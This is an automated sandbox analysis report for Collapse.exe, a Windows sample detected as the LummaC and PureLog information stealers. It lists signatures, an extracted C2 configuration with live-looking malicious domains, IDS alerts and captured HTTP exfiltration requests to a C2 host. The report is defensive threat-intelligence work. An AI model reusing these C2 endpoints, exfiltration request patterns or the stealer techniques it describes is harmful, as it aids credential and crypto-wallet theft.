Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Collapse.exe

Overview

General Information

Sample name:Collapse.exe
Analysis ID:1630105
MD5:04eacc602d626eba16224fdc15ef8aa5
SHA1:b34ada743e5e4ed6b34ae2894b057f8df75efb71
SHA256:6ac6fce5dddcd7e72952ba3c2e36e92c5c4aac45e2b5226060421193e882d996
Tags:exespywareuser-edv
Infos:

Detection

LummaC Stealer, PureLog Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to modify clipboard data
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Collapse.exe (PID: 4760 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 04EACC602D626EBA16224FDC15EF8AA5)
    • Collapse.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 04EACC602D626EBA16224FDC15EF8AA5)
    • WerFault.exe (PID: 4112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["sdfwfsdf.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "LPnhqo--qnhtzqcrazyg"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Collapse.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000001.00000002.3294762708.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                1.2.Collapse.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  1.2.Collapse.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    0.0.Collapse.exe.f40000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.Collapse.exe.42f9550.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        0.2.Collapse.exe.42f9550.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 1 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-05T14:57:19.214933+010020283713Unknown Traffic192.168.2.549704149.154.167.99443TCP
                          2025-03-05T14:57:20.010753+010020283713Unknown Traffic192.168.2.549705188.114.97.3443TCP
                          2025-03-05T14:57:22.954670+010020283713Unknown Traffic192.168.2.549712188.114.97.3443TCP
                          2025-03-05T14:57:24.255162+010020283713Unknown Traffic192.168.2.549713188.114.97.3443TCP
                          2025-03-05T14:57:25.813429+010020283713Unknown Traffic192.168.2.549714188.114.97.3443TCP
                          2025-03-05T14:57:28.170505+010020283713Unknown Traffic192.168.2.549715188.114.97.3443TCP
                          2025-03-05T14:57:32.599119+010020283713Unknown Traffic192.168.2.549719188.114.97.3443TCP
                          2025-03-05T14:57:33.820271+010020283713Unknown Traffic192.168.2.549722188.114.97.3443TCP
                          2025-03-05T14:57:37.205618+010020283713Unknown Traffic192.168.2.549728188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-05T14:57:22.449792+010020546531A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
                          2025-03-05T14:57:23.516026+010020546531A Network Trojan was detected192.168.2.549712188.114.97.3443TCP
                          2025-03-05T14:57:39.257381+010020546531A Network Trojan was detected192.168.2.549728188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-05T14:57:22.449792+010020498361A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-05T14:57:27.573571+010020480941Malware Command and Control Activity Detected192.168.2.549714188.114.97.3443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: phygcsforum.lifeAvira URL Cloud: Label: malware
                          Source: moderzysics.topAvira URL Cloud: Label: malware
                          Found malware configuration
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["sdfwfsdf.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "LPnhqo--qnhtzqcrazyg"}
                          Multi AV Scanner detection for submitted file
                          Source: Collapse.exeVirustotal: Detection: 55%Perma Link
                          Joe Sandbox ML detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.3% probability
                          Sample uses string decryption to hide its real strings
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString decryptor: sdfwfsdf.icu
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString decryptor: explorebieology.run
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString decryptor: gadgethgfub.icu
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString decryptor: moderzysics.top
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString decryptor: techmindzs.live
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString decryptor: codxefusion.top
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString decryptor: phygcsforum.life
                          Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString decryptor: techspherxe.top
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041BF19 CryptUnprotectData,1_2_0041BF19
                          Source: Collapse.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
                          Source: Collapse.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: Politic.pdb source: Collapse.exe, WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.ni.pdbRSDS source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: Politic.pdb$FXn source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.pdb) source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.ni.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.pdb source: WER6334.tmp.dmp.4.dr
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h1_2_0044F0C0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+5D5425F6h]1_2_0044F1E0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov ebp, edx1_2_0044F1E0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], A18B8074h1_2_00413181
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_00439DBD
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx eax, di1_2_004316C0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov esi, ecx1_2_00411F4E
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h1_2_0041AF10
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp ecx1_2_0041BF19
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0000027Ch]1_2_00438033
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [ebx], cl1_2_00438033
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h1_2_0042A830
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9F1F8F53h1_2_0044B030
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 18A944CDh1_2_00421089
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-4CC3DB68h]1_2_0044D0B0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp eax1_2_004329D3
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h1_2_004329D3
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh1_2_004019E0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-0584F30Bh]1_2_0044D9E0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]1_2_0044BA00
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_0040A220
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_0040A220
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh1_2_0044FAE0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+14h]1_2_0040CA90
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+14h]1_2_0040CA90
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [ebx], ax1_2_0040CA90
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov ebx, eax1_2_0044EAA2
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-2BD786AEh]1_2_0044C35E
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00433B12
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp word ptr [esi], 0025h1_2_00448320
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 744E5843h1_2_0044AB30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp eax1_2_0040DBE2
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_00435B80
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 18A944CDh1_2_0041F3B0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp ecx1_2_00420C28
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h1_2_00421C30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-7Ah]1_2_00421C30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-2202074Ch]1_2_00421C30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h1_2_00421C30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp word ptr [ebx+eax], 0000h1_2_00423C35
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00433CE3
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]1_2_00431CF0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000080h]1_2_00431CF0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h1_2_00431CF0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then add ecx, 02h1_2_0041FD48
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+16B9028Eh]1_2_0041FD48
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov dword ptr [esp+08h], edx1_2_00425510
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+46h]1_2_00431D10
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov esi, ebp1_2_0042FDC0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-00000086h]1_2_0042FDC0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax+2465CAC4h]1_2_0040DDB5
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]1_2_0041AE40
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov dword ptr [esp+04h], edi1_2_0044BE0B
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h1_2_0042AE30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h1_2_0042AE30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [edx], ax1_2_004246A4
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]1_2_00402750
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp ecx1_2_0041BF63
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+04h]1_2_00422F20
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00422F20
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx]1_2_0044AF20
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [eax], bl1_2_00410F30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_004437D0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h1_2_0044F780

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49714 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49728 -> 188.114.97.3:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: sdfwfsdf.icu
                          Source: Malware configuration extractorURLs: explorebieology.run
                          Source: Malware configuration extractorURLs: gadgethgfub.icu
                          Source: Malware configuration extractorURLs: moderzysics.top
                          Source: Malware configuration extractorURLs: techmindzs.live
                          Source: Malware configuration extractorURLs: codxefusion.top
                          Source: Malware configuration extractorURLs: phygcsforum.life
                          Source: Malware configuration extractorURLs: techspherxe.top
                          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 149.154.167.99:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 188.114.97.3:443
                          Source: global trafficHTTP traffic detected: GET /kz_prokla1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: t.me
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sdfwfsdf.icu
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: sdfwfsdf.icu
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QPW26Q0VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12784Host: sdfwfsdf.icu
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H1A60BTFA8F6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15050Host: sdfwfsdf.icu
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ABMGTG0TZ38JKITKDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20570Host: sdfwfsdf.icu
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QAK4EBFCG4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2686Host: sdfwfsdf.icu
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9ZSKVYPZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570494Host: sdfwfsdf.icu
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: sdfwfsdf.icu
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /kz_prokla1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: t.me
                          Source: global trafficDNS traffic detected: DNS query: t.me
                          Source: global trafficDNS traffic detected: DNS query: sdfwfsdf.icu
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sdfwfsdf.icu
                          Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/0y
                          Source: Collapse.exe, 00000001.00000002.3295883257.0000000001746000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/4
                          Source: Collapse.exe, 00000001.00000002.3295743874.0000000001733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/api
                          Source: Collapse.exe, 00000001.00000002.3295956102.0000000001757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/apiuo
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/r
                          Source: Collapse.exe, 00000001.00000002.3295883257.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/z
                          Source: Collapse.exe, 00000001.00000002.3294948894.000000000135B000.00000004.00000010.00020000.00000000.sdmp, Collapse.exe, 00000001.00000002.3295294937.00000000016DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/kz_prokla1
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
